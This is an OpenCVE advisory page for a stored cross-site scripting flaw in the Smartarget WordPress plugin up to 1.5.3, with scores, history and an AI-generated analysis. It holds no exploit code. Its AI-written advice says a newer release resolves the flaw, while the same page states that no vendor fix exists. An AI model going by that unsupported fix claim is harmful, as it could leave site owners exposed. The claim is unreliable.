Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erez Hadas-Sonnenschein Smartarget smartarget-contact-us allows Stored XSS.This issue affects Smartarget: from n/a through <= 1.5.3.
Published: 2025-02-18
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The Smartarget plugin for WordPress suffers from an improper neutralization of user input when generating web pages, which permits a stored cross‑site scripting flaw (CWE‑79). The vulnerability allows an attacker to place malicious script code within the plugin’s data, which is retained in the database and later displayed to site visitors. Because the script is stored, the effect is not limited to the initial request but can be re‑executed for any user who views the affected page.

Affected Systems

This flaw affects all instances of the Smartarget plugin for WordPress up to and including version 1.5.3, as the vulnerable code is present in every release from the initial version through that number. Any site using any of those releases is exposed.

Risk and Exploitability

The CVSS score of 6.5 indicates a medium severity for this stored XSS, while the EPSS score of less than 1% suggests a very low probability of exploitation at the time the data was collected. The vulnerability is not listed in the CISA KEV catalog. An attacker would need to submit malicious input via the plugin’s interface; the input is then stored by the system and rendered into the page viewed by other users. Given the medium severity and the low exploitation probability, the overall risk is moderate but the flaw should be remediated promptly.

Generated by OpenCVE AI on May 2, 2026 at 11:14 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the Smartarget WordPress plugin to any release newer than 1.5.3, which resolves the stored‑XSS flaw.
  • If an immediate update is not possible, disable or uninstall the Smartarget plugin to prevent the vulnerability from being triggered, and remove any data previously stored through the plugin to clear potential malicious scripts.
  • Implement a Content Security Policy that disallows inline scripts on the site, reducing the impact of any residual stored script content.

Generated by OpenCVE AI on May 2, 2026 at 11:14 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-4784 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erez Hadas-Sonnenschein Smartarget allows Stored XSS. This issue affects Smartarget: from n/a through 1.4.
History

Wed, 29 Apr 2026 10:15:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erez Hadas-Sonnenschein Smartarget allows Stored XSS. This issue affects Smartarget: from n/a through 1.4. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erez Hadas-Sonnenschein Smartarget smartarget-contact-us allows Stored XSS.This issue affects Smartarget: from n/a through <= 1.5.3.
Title WordPress Smartarget.online Integration plugin <= 1.4 - Cross Site Scripting (XSS) vulnerability WordPress Smartarget.online Integration plugin <= 1.5.3 - Cross Site Scripting (XSS) vulnerability
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Tue, 18 Feb 2025 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 18 Feb 2025 20:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Erez Hadas-Sonnenschein Smartarget allows Stored XSS. This issue affects Smartarget: from n/a through 1.4.
Title WordPress Smartarget.online Integration plugin <= 1.4 - Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-29T09:51:53.756Z

Reserved: 2025-01-07T21:02:43.843Z

Link: CVE-2025-22650

cve-icon Vulnrichment

Updated: 2025-02-18T20:09:21.650Z

cve-icon NVD

Status : Deferred

Published: 2025-02-18T20:15:26.720

Modified: 2026-04-29T10:16:39.590

Link: CVE-2025-22650

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-02T11:15:19Z

Weaknesses